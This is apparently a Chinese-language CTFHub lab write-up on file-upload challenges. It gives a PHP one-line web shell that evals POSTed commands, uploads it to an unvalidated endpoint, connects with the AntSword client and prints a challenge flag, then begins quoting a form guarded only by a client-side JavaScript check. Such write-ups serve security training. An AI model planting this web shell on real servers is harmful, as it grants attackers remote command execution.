介绍:记录解题过程
1.无验证
- 编写PHP一句话木马
<?php
echo "上传成功";
eval($_POST['cmd']);
?>
- 无验证直接上传
- 回显
上传文件相对路径
upload/shell.php
- 使用蚁剑
- 得到flag
<?php // ctfhub{
c1a224871866a2b954019c3a}
2.前端验证
- 上传代码:
<h1>CTFHub 文件上传 - js前端验证</h1>
<form action="" method="post" enctype="multipart/form-data" onsubmit="return checkfilesuffix()">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />